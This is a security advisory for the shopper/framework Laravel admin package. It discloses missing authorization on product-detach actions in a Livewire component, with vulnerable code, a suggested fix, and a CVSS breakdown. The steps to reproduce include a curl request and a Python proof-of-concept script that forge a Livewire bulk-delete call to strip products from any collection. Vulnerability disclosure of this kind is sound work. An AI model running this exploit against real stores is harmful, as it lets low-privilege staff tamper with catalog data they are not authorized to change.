Skip to content

Missing authorization on product removal actions in CollectionProducts component

High
mckenziearts published GHSA-2cg9-97gq-9mqp Jun 22, 2026

Package

composer shopper/framework (Composer)

Affected versions

< 2.9.2

Patched versions

2.9.2

Description

Title

Missing authorization on product removal actions in CollectionProducts component

Description

I found a lack of authorization control on both the per-record delete action and the bulk delete action inside packages/admin/src/Livewire/Components/Collection/CollectionProducts.php. Neither the Action::make('delete') at line 73 nor the DeleteBulkAction::make() at line 91 carries an ->authorize(...) chain. The component also exposes public Collection $collection without #[Locked], so the collection ID is mutable in the Livewire wire payload. Any authenticated admin-panel session, including staff who hold only browse_collections, can detach individual products or bulk-detach all products from any collection in the database.

Severity

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H Score: 8.1 (High)

Affected files

  • packages/admin/src/Livewire/Components/Collection/CollectionProducts.php:40,73-88,91-105
// Line 40 - client-mutable, no #[Locked]
public Collection $collection;

// Lines 73-88 - per-record delete action, no ->authorize(...)
->recordActions([
    Action::make('delete')
        ->label(__('shopper::forms.actions.delete'))
        ->icon(Untitledui::Trash03)
        ->iconButton()
        ->color('danger')
        ->requiresConfirmation()
        ->action(function (Product $record): void {
            $this->collection->products()->detach([$record->id]);
            $this->dispatch('collection.add.product');
            Notification::make()
                ->title(__('shopper::pages/collections.remove_product'))
                ->success()
                ->send();
        }),
])

// Lines 91-105 - bulk remove action, no ->authorize(...)
->groupedBulkActions([
    DeleteBulkAction::make()
        ->label(__('shopper::forms.actions.delete'))
        ->icon(Untitledui::Trash03)
        ->requiresConfirmation()
        ->action(function (EloquentCollection $records): void {
            $this->collection->products()->detach($records->pluck('id')->toArray());
            $this->dispatch('collection.add.product');
            Notification::make()
                ->title(__('shopper::pages/collections.remove_product'))
                ->success()
                ->send();
        })
        ->deselectRecordsAfterCompletion(),
])

Steps to reproduce

Prerequisites: any admin-panel account, including one whose role holds only browse_collections (no edit_collections required).

SESSION="laravel_session=<your_session_value>"
XSRF="X-XSRF-TOKEN: <url-decoded-value-of-XSRF-TOKEN-cookie>"

# Step 1: Note the collection ID you wish to empty (e.g., collection_id=5).
# Step 2: Call the bulk table action on the CollectionProducts component,
#          substituting collection ID 5 in the component state.

curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "X-XSRF-TOKEN: $XSRF" \
  -H "Cookie: $SESSION" \
  -H "X-Livewire: 1" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"COLLECTION_PRODUCTS_COMPONENT_ID\",\"data\":{\"collection\":5},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{
        "path": "",
        "method": "callBulkAction",
        "params": ["delete", [1, 2, 3, 4, 5]]
      }]
    }]
  }'
# Expected: HTTP 200, all listed product IDs detached from collection 5,
#           regardless of the caller having only browse_collections.

Proof of concept

#!/usr/bin/env python3
"""
CollectionProducts authorization bypass PoC.

Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  COLLECTION_ID   integer ID of the target collection
  PRODUCT_IDS     comma-separated product IDs to detach (e.g. "1,2,3")
"""

import json
import os
import requests

base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
collection_id = int(os.environ['COLLECTION_ID'])
product_ids   = [int(x) for x in os.environ['PRODUCT_IDS'].split(',')]

headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}

snapshot = json.dumps({
    'id': component_id,
    'data': {'collection': collection_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})

payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callBulkAction',
            'params': ['delete', product_ids],
        }]
    }]
}

r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])

Impact

A staff member holding only browse_collections can silently empty any collection by detaching all of its products. Collections drive storefront catalog grouping; removing products from a collection breaks the associated landing pages and promotions for those product groups. Because $collection is not locked, the attacker is not limited to the collection they navigated to: they can target any collection ID in the database, including featured promotional collections they have never viewed.

Suggested fix

// packages/admin/src/Livewire/Components/Collection/CollectionProducts.php

use Livewire\Attributes\Locked;

#[Locked]                          // prevent client-side ID substitution
public Collection $collection;

// Per-record action:
Action::make('delete')
    ->authorize('edit_collections')  // add this
    ->action(function (Product $record): void {
        $this->collection->products()->detach([$record->id]);
        // ...
    }),

// Bulk action:
DeleteBulkAction::make()
    ->authorize('edit_collections')  // add this
    ->action(function (EloquentCollection $records): void {
        $this->collection->products()->detach($records->pluck('id')->toArray());
        // ...
    })

Credits

Reported by Vishal Shukla (@shukla304 / @therawdev).

Sponsorship

This audit is from an AI-assisted research agent I'm building at sechub.dev. Running it on OSS projects is free for maintainers; sponsoring funds the model API costs that keep these audits flowing. Appreciated either way.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE ID

CVE-2026-56825

Weaknesses

Missing Authorization

The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Learn more on MITRE.

Credits